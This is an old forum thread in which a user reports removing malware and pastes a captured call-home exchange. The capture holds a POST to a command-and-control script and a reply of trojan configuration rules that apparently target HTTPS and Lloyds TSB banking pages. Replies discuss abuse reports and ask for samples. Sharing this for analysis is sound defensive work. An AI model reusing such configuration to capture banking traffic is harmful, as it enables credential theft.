My puter was "calling home" to

Do you have a question? Post it now! No Registration Necessary.  Now with pictures!

Threaded View
I have manually removed a malware from my system.
It was opening a lot of ports.
And every time it opend a new port
it was "calling home" to

I can provide a full Ethereal dump
and the 3 "bad" files I found
if anybody is interested.

I have sent an email the isp's abuse.

This is what Ethereal extracted:

POST /cgi-bin/ref.cgi?Sun%20Apr%2017%2016%3A58%3A13.593%202005 HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
Accept: */*
Accept-Language: en
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: close

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2005 04:00:09 GMT
Server: Apache/2.0.40 (Red Hat Linux)
Content-Length: 671
Connection: close
Content-Type: text/html; charset=ISO-8859-1

http +Ba "Mozilla/4.0 (compatible\; MSIE 6.0\;
Windows NT 5.1)"
httpp +
log +everything +Smz 1 9;setwnd 8 * * * +wclCME 60 1;timer
-qewrqrewq;timer +qewrqrewq -R+AIc 10000000 "setwnd 8 * * * -E"
setwnd 0 ** * * +urfKPMWS 4096 2 200000
setwnd 1 *.lloydsts* * * +urfKPMWS 4096 2 200000
setwnd 2 ** * * +urfKPMWS 4096 2 200000
setwnd 3 ** * * +urfKPMWS 4096 2 200000
setwnd 4 ** * * +urfKPMWS 4096 2 200000
setwnd 17 https://* * * +urfKPBMW 4096 1000 2
setwnd 18 * https://* * +urfKPBMW 4096 1000 2
setwnd 19 * * * +urfKP*MW 4096 2
http #hosts +I 60000

Re: My puter was "calling home" to

Quoted text here. Click to load it

I doubt that by you sending an email that anything is going to happen.  The
machine could have been compromised by someone else and is only a launching
pad to attack other machines on the Internet and the user may not be aware
of it.  If your machine was compromised, then a user of that machine
contributed to it in someway by clicking on something that lead to the
compromise. It just didn't happen by itself.

Duane :)

Re: My puter was "calling home" to

-rehn- wrote:

Quoted text here. Click to load it
Quoted text here. Click to load it

A whois on that IP points to Amsterdam. Good luck.

Re: My puter was "calling home" to

Could you please provide me with the Ethereal dump and the files you
found?  Depending on size, the easiest way would be to zip them up with
a password and email them to me - malwaretrojan at yahoo dot co dot uk.

If you would prefer to do it another way please let me know.



Site Timeline